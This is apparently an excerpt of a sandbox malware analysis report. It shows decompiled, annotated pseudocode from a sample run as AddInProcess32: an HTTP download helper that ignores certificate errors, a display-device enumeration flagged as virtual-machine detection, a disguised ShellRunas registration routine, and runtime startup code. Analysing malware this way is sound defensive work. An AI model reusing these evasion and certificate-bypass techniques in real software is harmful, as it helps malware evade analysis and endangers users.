                                              • Snapshot File: hcaresult_7_2_400000_AddInProcess32.jbxd
                                              Similarity
                                              • API ID: Item$MessageSend$BrushColorDialogTextWindow__swprintf
                                              • String ID: %s License Agreement
                                              • API String ID: 2951897483-1285993597
                                              • Opcode ID: b222d6317158b18de7cdf78b0e5675ac59ac6db589ad6d1fb58f5eea72f61197
                                              • Instruction ID: 1530dd87393cf7f224303f11dcabdbff35385f3a88108dc3a53a8d27bff466c6
                                              • Opcode Fuzzy Hash: b222d6317158b18de7cdf78b0e5675ac59ac6db589ad6d1fb58f5eea72f61197
                                              • Instruction Fuzzy Hash: D031F6715843016BD310AFA89D49FAF76D8AB8C708F10493EF645B62E0DB7CDA05866F
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              C-Code - Quality: 93%
                                              			E02B5197B(void* __ebx, WCHAR* __ecx, void* __edi, void* __esi, intOrPtr _a4, intOrPtr* _a8) {
                                              				signed int _v8;
                                              				short _v268;
                                              				short _v524;
                                              				short _v1036;
                                              				char _v1556;
                                              				short _v5724;
                                              				char _v9892;
                                              				void* _v9896;
                                              				WCHAR* _v9900;
                                              				void _v9904;
                                              				intOrPtr _v9908;
                                              				long _v9912;
                                              				long _v9916;
                                              				intOrPtr _v9928;
                                              				WCHAR* _v9932;
                                              				intOrPtr _v9936;
                                              				WCHAR* _v9940;
                                              				intOrPtr _v9944;
                                              				WCHAR* _v9948;
                                              				short _v9952;
                                              				intOrPtr _v9956;
                                              				WCHAR* _v9960;
                                              				intOrPtr _v9964;
                                              				void* _v9976;
                                              				signed int _t60;
                                              				void* _t71;
                                              				void* _t72;
                                              				void* _t79;
                                              				long _t84;
                                              				int _t88;
                                              				intOrPtr _t89;
                                              				void* _t94;
                                              				intOrPtr _t100;
                                              				WCHAR* _t107;
                                              				WCHAR* _t111;
                                              				intOrPtr* _t114;
                                              				void* _t117;
                                              				long _t121;
                                              				signed int _t122;
                                              
                                              				E02B53F00(); // probably the compiler's stack probe (__chkstk) for this ~9.9 KB frame; helper not recovered
                                              				_t60 =  *0x2b56004; // 0xbb40e64e: MSVC /GS security cookie
                                              				_v8 = _t60 ^ _t122; // cookie ^ frame pointer, checked again at return
                                              				_push(__ebx);
                                              				_push(__esi);
                                              				_push(__edi);
                                              				_t114 = _a8;
                                              				_v9908 = _a4;
                                              				_v9904 = _v9904 & 0;
                                              				_v9900 = __ecx;
                                              				_t117 = 0x3c; // 0x3c == sizeof(URL_COMPONENTSW) on 32-bit Windows
                                              				_v1036 = 0;
                                              				_v524 = 0;
                                              				_v268 = 0;
                                              				_v9892 = 0;
                                              				_v5724 = 0;
                                              				_v1556 = 0;
                                              				_v9916 = 4; // buffer length for HttpQueryInfoW below (one DWORD)
                                              				E02B52CE7(0,  &_v9976, _t117); // zeroes the URL_COMPONENTSW at _v9976 (memset-like helper, inferred from its arguments)
                                              				_v9976 = _t117; // dwStructSize
                                              				_v9960 =  &_v1036; // lpszHostName (256-WCHAR buffer)
                                              				_t20 = _t117 + 0x44; // 0x80
                                              				_t100 = _t20;
                                              				_v9948 =  &_v524; // lpszUserName
                                              				_v9944 = _t100; // dwUserNameLength = 0x80
                                              				_v9940 =  &_v268; // lpszPassword
                                              				_v9936 = _t100; // dwPasswordLength = 0x80
                                              				_v9956 = 0x100; // dwHostNameLength
                                              				_v9932 =  &_v9892; // lpszUrlPath
                                              				_t94 = 0;
                                              				_v9928 = 0x824; // dwUrlPathLength
                                              				_v9912 = 0;
                                              				_v9896 = 0;
                                              				if(_t114 != 0) {
                                              					if(InternetCrackUrlW(_v9900, 0, 0,  &_v9976) == 0 || _v9964 != 3 && _v9964 != 4) { // _v9964 is nScheme: only INTERNET_SCHEME_HTTP (3) and INTERNET_SCHEME_HTTPS (4) are accepted
                                              						_t119 = 0;
                                              						goto L19;
                                              					} else {
                                              						_t121 =  ==  ? 0x80803000 : 0x80000000; // condition lost by the decompiler; 0x80000000 = INTERNET_FLAG_RELOAD, 0x80803000 adds INTERNET_FLAG_SECURE plus INTERNET_FLAG_IGNORE_CERT_CN_INVALID and INTERNET_FLAG_IGNORE_CERT_DATE_INVALID (certificate errors are ignored)
                                              						_v9900 = _t121;
                                              						_t79 = InternetOpenW(L"Chrome", 0, 0, 0, 0); // user agent "Chrome", INTERNET_OPEN_TYPE_PRECONFIG
                                              						_v9912 = _t79;
                                              						if(_t79 != 0) {
                                              							_t94 = InternetConnectW(_t79,  &_v1036, _v9952,  &_v524,  &_v268, 3, 0, 0); // host, nPort, user name and password come from the parsed URL; 3 = INTERNET_SERVICE_HTTP
                                              							if(_t94 != 0) {
                                              								_t107 =  &_v5724;
                                              								_t111 = _v9932;
                                              								if(_v9928 == 0) { // empty URL path -> request "/"
                                              									_t111 = "/";
                                              								}
                                              								E02B52C9C(_t107, _t111);
                                              								_v9896 = HttpOpenRequestW(_t94, L"HEAD",  &_v5724, L"HTTP/1.1", 0x2b542bc, 0, _t121, 0); // HEAD request with the flags chosen above; 0x2b542bc is the referrer string (not recovered here)
                                              								_t84 = E02B514D8(_t83); // helper not recovered; a zero result skips to the cleanup at L19
                                              								_t119 = _t84;
                                              								if(_t84 == 0) {
                                              									L19:
                                              									_t71 = _v9896;
                                              									if(_t71 != 0) {
                                              										InternetCloseHandle(_t71);
                                              									}
                                              									if(_t94 != 0) {
                                              										InternetCloseHandle(_t94);
                                              									}
                                              									L23:
                                              									_t72 = _v9912;
                                              									if(_t72 != 0) {
                                              										InternetCloseHandle(_t72);
                                              									}
                                              									L25:
                                              									goto L26;
                                              								} else {
                                              									_t119 = 0;
                                              									_t88 = HttpQueryInfoW(_v9896, 0x20000005,  &_v9904,  &_v9916, 0); // 0x20000005 = HTTP_QUERY_CONTENT_LENGTH | HTTP_QUERY_FLAG_NUMBER: Content-Length as a DWORD in _v9904
                                              									_t89 = _v9904;
                                              									if(_t88 == 0) {
                                              										L17:
                                              										_t119 = E02B51564(_t94, _t94,  &_v5724, _t114, _t119, _t119, _t119, _t89 - 1, _v9908, 1,  &_v1556, _v9900); // helper not recovered; receives the connection, the path, the content length minus one, a MAX_PATH-sized buffer (_v1556) and the request flags
                                              										goto L19;
                                              									}
                                              									if(_t89 > 0x3e800000) { // refuses bodies larger than 0x3e800000 bytes (1,048,576,000)
                                              										goto L19;
                                              									}
                                              									if(_t114 == 0) {
                                              										goto L17;
                                              									}
                                              									 *_t114 = _t89;
                                              									if( *_t114 >= _t89) {
                                              										goto L17;
                                              									}
                                              									_t119 = 3;
                                              									goto L19;
                                              								}
                                              							}
                                              							_t119 = 0;
                                              							goto L23;
                                              						}
                                              						_t119 = 0;
                                              						goto L25;
                                              					}
                                              				} else {
                                              					L26:
                                              					return E02B53C33(_v8 ^ _t122); // __security_check_cookie
                                              				}
                                              			}

                                              APIs
                                              • InternetCrackUrlW.WININET(?,00000000,00000000,?), ref: 02B51A7B
                                              • InternetOpenW.WININET(Chrome,00000000,00000000,00000000,00000000), ref: 02B51ABF
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000007.00000002.392656395.0000000002B50000.00000040.00001000.00020000.00000000.sdmp, Offset: 02B50000, based on PE: true
                                              • Associated: 00000007.00000002.392656395.0000000002B56000.00000040.00001000.00020000.00000000.sdmp
                                              • Associated: 00000007.00000002.392656395.0000000002B5B000.00000040.00001000.00020000.00000000.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_7_2_2b50000_AddInProcess32.jbxd
                                              Similarity
                                              • API ID: Internet$CrackOpen
                                              • String ID: Chrome$HEAD$HTTP/1.1
                                              • API String ID: 1262293563-235090430
                                              • Opcode ID: 50d5ac6dbc366125e64432129b8f65557aa5226a81ff2c8b21f5f979119d38df
                                              • Instruction ID: 7f87f8814b9e4fb43dd751766a7f575f91f22ce08e8aa2ce59a7a9b6a68a3b16
                                              • Opcode Fuzzy Hash: 50d5ac6dbc366125e64432129b8f65557aa5226a81ff2c8b21f5f979119d38df
                                              • Instruction Fuzzy Hash: EE610A75D116399FDB25DF689C88BEAB7B8EB14244F0005EAE90DEB200EB715EC48F51
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              C-Code - Quality: 55%
                                              			// Builds a "--"-separated inventory of display adapters and their attached monitors into the caller's buffer (__ecx).
                                              			// Adapter and monitor names are a common virtual-machine fingerprint; the report flags VM detection for this sample.
                                              			E02B52E5C(void* __ebx, CHAR* __ecx, void* __edi, void* __esi) {
                                              				signed int _v8;
                                              				char _v516;
                                              				struct _DISPLAY_DEVICEA _v940;
                                              				char _v1328;
                                              				char _v1360;
                                              				long _v1364;
                                              				signed int _v1368;
                                              				intOrPtr _v1372;
                                              				signed int _t28;
                                              				char _t60;
                                              				long _t61;
                                              				CHAR* _t78;
                                              				signed int _t80;
                                              				signed int _t82;
                                              
                                              				_t82 = (_t80 & 0xfffffff8) - 0x55c; // 8-byte aligned frame
                                              				_t28 =  *0x2b56004; // 0xbb40e64e: MSVC /GS security cookie
                                              				_v8 = _t28 ^ _t82;
                                              				_push(1);
                                              				_t78 = __ecx;
                                              				_v1364 = 0x1a8; // cb of the adapter DISPLAY_DEVICEA (0x1a8 == sizeof(DISPLAY_DEVICEA)); _v1360 is its DeviceName, _v1328 its DeviceString
                                              				_push( &_v1364);
                                              				_push(0);
                                              				_t60 = 0;
                                              				 *((char*)(__ecx)) = 0; // output string starts empty
                                              				_push(0);
                                              				while(1) { // outer loop over display adapters
                                              					_v1372 = _t60;
                                              					if(EnumDisplayDevicesA(??, ??, ??, ??) == 0) { // arguments are the four pushes above: (NULL, _t60, &_v1364, 1 = EDD_GET_DEVICE_INTERFACE_NAME); the decompiler could not resolve them
                                              						break;
                                              					}
                                              					E02B52CE7(_t31,  &_v940, 0x1a8); // zeroes the monitor DISPLAY_DEVICEA (memset-like helper, inferred from its arguments)
                                              					_v1368 = _v1368 & 0x00000000; // monitor index starts at 0
                                              					 *_t82 = "--"; // stored at the top of the stack, probably the unresolved first argument of the lstrcatA below
                                              					_v940.cb = 0x1a8;
                                              					_v516 = 0;
                                              					lstrcatA( &_v516, ??); // argument not recovered by the decompiler
                                              					lstrcatA( &_v516,  &_v1360); // adapter DeviceName
                                              					lstrcatA( &_v516, "--");
                                              					lstrcatA( &_v516,  &_v1328); // adapter DeviceString
                                              					lstrcatA( &_v516, "--");
                                              					E02B52D16(_t78,  &_v516, 0x1c2); // bounded append into the caller's buffer (helper inferred from its arguments)
                                              					if(EnumDisplayDevicesA( &_v1360, 0,  &_v940, 1) != 0) { // inner loop: monitors attached to this adapter
                                              						_t61 = _v1368;
                                              						do {
                                              							lstrcatA(_t78,  &(_v940.DeviceName));
                                              							lstrcatA(_t78, "--");
                                              							E02B52D16(_t78,  &(_v940.DeviceString), 0x28a);
                                              							_t61 = _t61 + 1;
                                              						} while (EnumDisplayDevicesA( &_v1360, _t61,  &_v940, 1) != 0); // next monitor index
                                              						_t60 = _v1372;
                                              					}
                                              					GetLastError(); // result discarded
                                              					_push(1);
                                              					_t60 = _t60 + 1;
                                              					_push( &_v1364);
                                              					_push(_t60);
                                              					_push(0);
                                              				}
                                              				return E02B53C33(_v8 ^ _t82); // __security_check_cookie
                                              			}

                                              APIs
                                              • lstrcatA.KERNEL32 ref: 02B52ED5
                                              • lstrcatA.KERNEL32(?,000001A8), ref: 02B52EE8
                                              • lstrcatA.KERNEL32(?,02B5447C), ref: 02B52EFB
                                              • lstrcatA.KERNEL32(?,?), ref: 02B52F0E
                                              • lstrcatA.KERNEL32(?,02B5447C), ref: 02B52F21
                                              • EnumDisplayDevicesA.USER32(?,00000000,?,00000001), ref: 02B52F4C
                                              • lstrcatA.KERNEL32(?,?), ref: 02B52F5F
                                              • lstrcatA.KERNEL32(?,02B5447C), ref: 02B52F6B
                                              • EnumDisplayDevicesA.USER32(?,?,?,00000001), ref: 02B52F96
                                              • GetLastError.KERNEL32 ref: 02B52FA0
                                              • EnumDisplayDevicesA.USER32(00000000,00000000,?), ref: 02B52FB5
                                              Memory Dump Source
                                              • Source File: 00000007.00000002.392656395.0000000002B50000.00000040.00001000.00020000.00000000.sdmp, Offset: 02B50000, based on PE: true
                                              • Associated: 00000007.00000002.392656395.0000000002B56000.00000040.00001000.00020000.00000000.sdmp
                                              • Associated: 00000007.00000002.392656395.0000000002B5B000.00000040.00001000.00020000.00000000.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_7_2_2b50000_AddInProcess32.jbxd
                                              Similarity
                                              • API ID: lstrcat$DevicesDisplayEnum$ErrorLast
                                              • String ID:
                                              • API String ID: 2199724215-0
                                              • Opcode ID: 858cd509b39438ccf8fc5cf2dbc50a1a60e33ef9600a9a6507b71edd4afa1c53
                                              • Instruction ID: 4e1ba14867f1581a9ed424e66796a8611188b4a442559c3b7252f5ad9017f5ac
                                              • Opcode Fuzzy Hash: 858cd509b39438ccf8fc5cf2dbc50a1a60e33ef9600a9a6507b71edd4afa1c53
                                              • Instruction Fuzzy Hash: BA416072649355AFE620DF60DC85FEB77ECEF88340F000959F989CB180DB7196498B92
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              C-Code - Quality: 95%
                                              			// Registers the ShellRunas (Sysinternals) context-menu verb under HKEY_CURRENT_USER (0x80000001 in the RegCreateKeyExW calls listed below)
                                              			// for .exe, lnkfile and .msc through subcall E004019F0; _a4 != 0 reports failures via E00401880, _a4 == 0 shows a success MessageBoxW.
                                              			E00401BA0(void* __eax, void* __esi, void* __eflags, char _a4) {
                                              				void* __ebx;
                                              				struct HWND__* _t9;
                                              				struct HWND__* _t16;
                                              				void* _t17;
                                              				void* _t20;
                                              				void* _t21;
                                              
                                              				_t17 = __esi;
                                              				_t12 = __eax;
                                              				_t16 = E004019F0(__eax, L".exe", L"Software\\Classes\\SystemFileAssociations"); // nonzero result means the registration step failed (see the branch below)
                                              				_t21 = _t20 + 4;
                                              				if(_t16 != 0) { // a registration step failed
                                              					L5:
                                              					if(_a4 != 0) {
                                              						_push(_t17);
                                              						E00401880(L"Error registering context menu hander", _t16); // string as stored in the binary
                                              						_t21 = _t21 + 4;
                                              					}
                                              					E00401930(0);
                                              					return _t16;
                                              				}
                                              				_t16 = E004019F0(_t12, L"lnkfile", L"Software\\Classes"); // second verb: shortcut files
                                              				_t21 = _t21 + 4;
                                              				if(_t16 != 0) {
                                              					goto L5;
                                              				}
                                              				_t9 = E004019F0(_t12, L".msc", L"Software\\Classes\\SystemFileAssociations"); // third verb: management console files
                                              				_t16 = _t9;
                                              				_t21 = _t21 + 4;
                                              				if(_t16 != 0) {
                                              					goto L5;
                                              				}
                                              				if(_a4 == _t9) { // _t9 is 0 here: return quietly when _a4 == 0
                                              					return _t9;
                                              				} else {
                                              					MessageBoxW(_t9, L"ShellRunas context menu handler successfully registered.", L"ShellRunas - Sysinternals: www.sysinternals.com", 0x40); // 0x40 = MB_ICONINFORMATION
                                              					return _t16;
                                              				}
                                              			}

                                              APIs
                                                • Part of subcall function 004019F0: RegCreateKeyExW.ADVAPI32(80000001,?,00000000,00000000,00000000,00000004,00000000,?,00000000,?), ref: 00401A2C
                                                • Part of subcall function 004019F0: RegCreateKeyExW.ADVAPI32(?,.exe,00000000,00000000,00000000,00000004,00000000,?,00000000), ref: 00401A49
                                                • Part of subcall function 004019F0: RegCreateKeyExW.ADVAPI32(?,Shell,00000000,00000000,00000000,00000004,00000000,?,00000000), ref: 00401A76
                                                • Part of subcall function 004019F0: RegCreateKeyExW.ADVAPI32(?,Run as different user (netonly)...,00000000,00000000,00000000,00000004,00000000,?,00000000), ref: 00401AA7
                                                • Part of subcall function 004019F0: RegCreateKeyExW.ADVAPI32(?,Command,00000000,00000000,00000000,00000006,00000000,?,00000000), ref: 00401AC9
                                                • Part of subcall function 004019F0: GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 00401AE0
                                                • Part of subcall function 004019F0: _swprintf.LIBCMT ref: 00401B1A
                                                • Part of subcall function 004019F0: RegSetValueW.ADVAPI32(?,00000000,00000001,?), ref: 00401B54
                                                • Part of subcall function 004019F0: RegCloseKey.ADVAPI32(?), ref: 00401B61
                                                • Part of subcall function 004019F0: RegCloseKey.ADVAPI32(?), ref: 00401B68
                                                • Part of subcall function 004019F0: RegCloseKey.ADVAPI32(?), ref: 00401B6F
                                                • Part of subcall function 004019F0: RegCloseKey.ADVAPI32(?), ref: 00401B76
                                                • Part of subcall function 004019F0: RegCloseKey.ADVAPI32(?), ref: 00401B7D
                                              • MessageBoxW.USER32(00000000,ShellRunas context menu handler successfully registered.,ShellRunas - Sysinternals: www.sysinternals.com,00000040), ref: 00401BFF
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000007.00000002.392248619.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000007.00000002.392248619.0000000000416000.00000040.00000400.00020000.00000000.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_7_2_400000_AddInProcess32.jbxd
                                              Similarity
                                              • API ID: CloseCreate$FileMessageModuleNameValue_swprintf
                                              • String ID: .exe$.msc$Error registering context menu hander$ShellRunas - Sysinternals: www.sysinternals.com$ShellRunas context menu handler successfully registered.$Software\Classes$Software\Classes\SystemFileAssociations$lnkfile
                                              • API String ID: 23047349-2855299177
                                              • Opcode ID: 0d7b3cff5730ebffb2b1ca40e72fbba3252ccff6b5cd4318ad2bd8684b1371f8
                                              • Instruction ID: d48563127560b7a8e7189787d004048206fac3746307ea1a651a0f4517783a92
                                              • Opcode Fuzzy Hash: 0d7b3cff5730ebffb2b1ca40e72fbba3252ccff6b5cd4318ad2bd8684b1371f8
                                              • Instruction Fuzzy Hash: F8F0A7B5AC430422F3112296290279B114587D17B5F1C407BFE55773F3D97CC885826E
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              C-Code - Quality: 78%
                                              			E00401880(void* __esi, long _a4) {
                                              				signed int _v4;
                                              				short _v516;
                                              				short _v520;
                                              				signed int _t8;
                                              				long _t10;
                                              				void* _t14;
                                              				void* _t18;
                                              				signed int _t26;
                                              				signed int _t27;
                                              
                                              				_t25 = __esi;
                                              				_t26 =  &_v520;
                                              				_t8 =  *0x413004; // 0x98fc836b
                                              				_v4 = _t8 ^ _t26;
                                              				_t10 = _a4;
                                              				if(_t10 == 0) {
                                              					E004032BD( &_v516, 0x100, L"%s.", __esi);
                                              					_t27 = _t26 + 0x10;
                                              				} else {
                                              					FormatMessageW(0x1100, 0, _t10, 0x400,  &_v520, 0, 0);
                                              					_push(_v520);
                                              					E004032BD( &_v516, 0x100, L"%s:\n%s", __esi);
                                              					_t27 = _t26 + 0x14;
                                              				}
                                              				MessageBoxW(0,  &_v516, L"ShellRunas - Sysinternals: www.sysinternals.com", 0x10);
                                              				_t14 = LocalFree(_v520);
                                              				E0040318A(_t14, _t18, _v4 ^ _t27, _t25);
                                              				return _t14;
                                              			}

                                              APIs
                                              • FormatMessageW.KERNEL32(00001100,00000000,?,00000400,00000000,00000000,00000000), ref: 004018B5
                                              • _swprintf.LIBCMT ref: 004018CF
                                                • Part of subcall function 004032BD: __vswprintf_s_l.LIBCMT ref: 004032D0
                                              • _swprintf.LIBCMT ref: 004018E9
                                              • MessageBoxW.USER32(00000000,?,ShellRunas - Sysinternals: www.sysinternals.com,00000010), ref: 004018FF
                                              • LocalFree.KERNEL32(00000000), ref: 00401909
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000007.00000002.392248619.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000007.00000002.392248619.0000000000416000.00000040.00000400.00020000.00000000.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_7_2_400000_AddInProcess32.jbxd
                                              Similarity
                                              • API ID: Message_swprintf$FormatFreeLocal__vswprintf_s_l
                                              • String ID: %s.$%s:%s$Error launching application$ShellRunas - Sysinternals: www.sysinternals.com
                                              • API String ID: 1614748391-2411704194
                                              • Opcode ID: 0d8038b8c8fa5fae2156050a63efd2f74c1b151e05b4e0866b50721f8c9af105
                                              • Instruction ID: d7ba5e9dad247dd55833599d546a55f01d268ccc4582619336c1b705aef3043d
                                              • Opcode Fuzzy Hash: 0d8038b8c8fa5fae2156050a63efd2f74c1b151e05b4e0866b50721f8c9af105
                                              • Instruction Fuzzy Hash: 090188B06443007BE220EB50CC4BFEB7BA8AF5CB51F50892DB659A61C1DBF4A544C75E
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              C-Code - Quality: 100%
                                              			E02B529B2(WCHAR* __ecx, void** __edx, long* _a4) {
                                              				long _v8;
                                              				long _v12;
                                              				void** _v16;
                                              				long _t26;
                                              				void* _t31;
                                              				void* _t33;
                                              
                                              				_t26 = 0;
                                              				_v16 = __edx;
                                              				_t33 = CreateFileW(__ecx, 0x80000000, 1, 0, 3, 0, 0);
                                              				_t31 = 0;
                                              				if(_t33 == 0xffffffff) {
                                              					L6:
                                              					 *_a4 = _t26;
                                              					 *_v16 = _t31;
                                              					return 1;
                                              				}
                                              				if(GetFileSize(_t33,  &_v12) != 0) {
                                              					_v8 = _v8 & 0;
                                              					_t26 = GetFileSize(_t33,  &_v12);
                                              					_t31 = HeapAlloc(GetProcessHeap(), 0, _t26);
                                              					ReadFile(_t33, _t31, _t26,  &_v8, 0);
                                              					if(_t26 == _v8) {
                                              						CloseHandle(_t33);
                                              						goto L6;
                                              					}
                                              					HeapFree(GetProcessHeap(), 0, _t31);
                                              				}
                                              				CloseHandle(_t33);
                                              				return 0;
                                              			}

                                              APIs
                                              • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000,?,00000000,?,02B5140A,?), ref: 02B529CD
                                              • GetFileSize.KERNEL32(00000000,?,?,00000000,?,02B5140A,?), ref: 02B529E7
                                              • CloseHandle.KERNEL32(00000000,?,00000000,?,02B5140A,?), ref: 02B529EE
                                              • GetFileSize.KERNEL32(00000000,?,?,00000000,?,02B5140A,?), ref: 02B52A00
                                              • GetProcessHeap.KERNEL32(00000000,00000000,?,00000000,?,02B5140A,?), ref: 02B52A07
                                              • HeapAlloc.KERNEL32(00000000,?,00000000,?,02B5140A,?), ref: 02B52A0E
                                              • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,00000000,?,02B5140A,?), ref: 02B52A1F
                                              • GetProcessHeap.KERNEL32(00000000,00000000,?,00000000,?,02B5140A,?), ref: 02B52A2D
                                              • HeapFree.KERNEL32(00000000,?,00000000,?,02B5140A,?), ref: 02B52A34
                                              • CloseHandle.KERNEL32(00000000,?,00000000,?,02B5140A,?), ref: 02B52A3D
                                              Memory Dump Source
                                              • Source File: 00000007.00000002.392656395.0000000002B50000.00000040.00001000.00020000.00000000.sdmp, Offset: 02B50000, based on PE: true
                                              • Associated: 00000007.00000002.392656395.0000000002B56000.00000040.00001000.00020000.00000000.sdmp
                                              • Associated: 00000007.00000002.392656395.0000000002B5B000.00000040.00001000.00020000.00000000.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_7_2_2b50000_AddInProcess32.jbxd
                                              Similarity
                                              • API ID: FileHeap$CloseHandleProcessSize$AllocCreateFreeRead
                                              • String ID:
                                              • API String ID: 1490804313-0
                                              • Opcode ID: d5ce433b007f0e70924623a9044dbf798d239767d52208c7413169e2b1431b43
                                              • Instruction ID: 0d6d54fd8cdc5c9aa6f9066f94e020749082ee833d49854584ed31caf755459e
                                              • Opcode Fuzzy Hash: d5ce433b007f0e70924623a9044dbf798d239767d52208c7413169e2b1431b43
                                              • Instruction Fuzzy Hash: 3811B172941228BFE7109FA59C88FAF7BBCEF48295F250565FA05DB140D7704E458B70
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              C-Code - Quality: 83%
                                              			E00406529(void* __ebx, void* __edi, void* __esi, void* __eflags) {
                                              				struct HINSTANCE__* _t21;
                                              				long _t23;
                                              				intOrPtr _t25;
                                              				intOrPtr _t29;
                                              				intOrPtr _t40;
                                              				void* _t41;
                                              
                                              				_t33 = __ebx;
                                              				_push(0xc);
                                              				_push(0x411a98);
                                              				E00404A88(__ebx, __edi, __esi);
                                              				_t21 = GetModuleHandleA("KERNEL32.DLL");
                                              				 *(_t41 - 0x1c) = _t21;
                                              				_t40 =  *((intOrPtr*)(_t41 + 8));
                                              				 *((intOrPtr*)(_t40 + 0x5c)) = 0x413990;
                                              				 *((intOrPtr*)(_t40 + 0x14)) = 1;
                                              				_t43 = _t21;
                                              				if(_t21 != 0 && E00406360(_t43) != 0) {
                                              					_t33 = GetProcAddress;
                                              					 *((intOrPtr*)(_t40 + 0x1f8)) = GetProcAddress( *(_t41 - 0x1c), "EncodePointer");
                                              					 *((intOrPtr*)(_t40 + 0x1fc)) = GetProcAddress( *(_t41 - 0x1c), "DecodePointer");
                                              				}
                                              				 *((intOrPtr*)(_t40 + 0x70)) = 1;
                                              				 *((char*)(_t40 + 0xc8)) = 0x43;
                                              				 *((char*)(_t40 + 0x14b)) = 0x43;
                                              				 *(_t40 + 0x68) = 0x4132a8;
                                              				_t23 = InterlockedIncrement(0x4132a8);
                                              				_push(0xc);
                                              				E00403F58(_t23, _t33);
                                              				 *(_t41 - 4) =  *(_t41 - 4) & 0x00000000;
                                              				_t25 =  *((intOrPtr*)(_t41 + 0xc));
                                              				 *((intOrPtr*)(_t40 + 0x6c)) = _t25;
                                              				if(_t25 == 0) {
                                              					_t29 =  *0x4138b0; // 0x4137d8
                                              					 *((intOrPtr*)(_t40 + 0x6c)) = _t29;
                                              				}
                                              				_push( *((intOrPtr*)(_t40 + 0x6c)));
                                              				E0040619A();
                                              				 *(_t41 - 4) = 0xfffffffe;
                                              				return E00404ACD(E004065DF());
                                              			}

                                              APIs
                                              • GetModuleHandleA.KERNEL32(KERNEL32.DLL,00411A98,0000000C,0040663A,00000000,00000000), ref: 0040653A
                                              • GetProcAddress.KERNEL32(?,EncodePointer), ref: 0040656E
                                              • GetProcAddress.KERNEL32(?,DecodePointer), ref: 0040657E
                                              • InterlockedIncrement.KERNEL32(004132A8), ref: 004065A0
                                              • ___addlocaleref.LIBCMT ref: 004065C7
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000007.00000002.392248619.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000007.00000002.392248619.0000000000416000.00000040.00000400.00020000.00000000.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_7_2_400000_AddInProcess32.jbxd
                                              Similarity
                                              • API ID: AddressProc$HandleIncrementInterlockedModule___addlocaleref
                                              • String ID: DecodePointer$EncodePointer$KERNEL32.DLL
                                              • API String ID: 1389861978-2843748187
                                              • Opcode ID: d8b2b6e96166e3e6081c3c5c7c145de861ff6874afd2058ea1e84f3c4318444a
                                              • Instruction ID: 24d076e0758c3fb3c9b827cd62f2c980b6cafb2106825d784225c4fa2649cf60
                                              • Opcode Fuzzy Hash: d8b2b6e96166e3e6081c3c5c7c145de861ff6874afd2058ea1e84f3c4318444a
                                              • Instruction Fuzzy Hash: 12116DB1940705AED720AFB69905B5ABBE0AF00314F10853EE99AB62D0DB78A9448F1D
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              C-Code - Quality: 83%
                                              			E00407844(void* __ebx, signed int __edx, void* __edi, void* __esi, void* __eflags) {
                                              				signed int _t61;
                                              				void* _t64;
                                              				long _t68;
                                              				signed int _t71;
                                              				signed int _t72;
                                              				int* _t74;
                                              				signed int* _t77;
                                              				signed char _t79;
                                              				long _t86;
                                              				signed int _t88;
                                              				int* _t89;
                                              				signed int _t92;
                                              				void* _t98;
                                              				signed int** _t101;
                                              				signed int _t102;
                                              				void* _t106;
                                              				int _t107;
                                              				int _t109;
                                              				void** _t112;
                                              				signed int _t114;
                                              				void** _t118;
                                              				void* _t119;
                                              
                                              				_t102 = __edx;
                                              				_push(0x54);
                                              				_push(0x411b00);
                                              				E00404A88(__ebx, __edi, __esi);
                                              				 *(_t119 - 4) = 0;
                                              				GetStartupInfoA(_t119 - 0x64);
                                              				 *(_t119 - 4) = 0xfffffffe;
                                              				_push(0x38);
                                              				_t109 = 0x20;
                                              				_push(_t109);
                                              				_t61 = E00407C87();
                                              				if(_t61 == 0) {
                                              					L45:
                                              					_t62 = _t61 | 0xffffffff;
                                              					__eflags = _t61 | 0xffffffff;
                                              					L46:
                                              					return E00404ACD(_t62);
                                              				}
                                              				 *0x415ae0 = _t61;
                                              				 *0x415ac8 = _t109;
                                              				_t4 = _t61 + 0x700; // 0x700
                                              				_t92 = _t4;
                                              				while(_t61 < _t92) {
                                              					 *((char*)(_t61 + 4)) = 0;
                                              					 *_t61 =  *_t61 | 0xffffffff;
                                              					 *((char*)(_t61 + 5)) = 0xa;
                                              					 *((intOrPtr*)(_t61 + 8)) = 0;
                                              					 *((char*)(_t61 + 0x24)) = 0;
                                              					 *((char*)(_t61 + 0x25)) = 0xa;
                                              					 *((char*)(_t61 + 0x26)) = 0xa;
                                              					_t61 = _t61 + 0x38;
                                              					_t92 =  *0x415ae0 + 0x700;
                                              					__eflags = _t92;
                                              				}
                                              				if( *((intOrPtr*)(_t119 - 0x32)) == 0) {
                                              					L26:
                                              					_t88 = 0;
                                              					do {
                                              						_t112 = _t88 * 0x38 +  *0x415ae0;
                                              						_t64 =  *_t112;
                                              						if(_t64 == 0xffffffff || _t64 == 0xfffffffe) {
                                              							_t112[1] = 0x81;
                                              							__eflags = _t88;
                                              							if(_t88 != 0) {
                                              								asm("sbb eax, eax");
                                              								_t68 =  ~(_t88 - 1) + 0xfffffff5;
                                              								__eflags = _t68;
                                              							} else {
                                              								_t68 = 0xfffffff6;
                                              							}
                                              							_t106 = GetStdHandle(_t68);
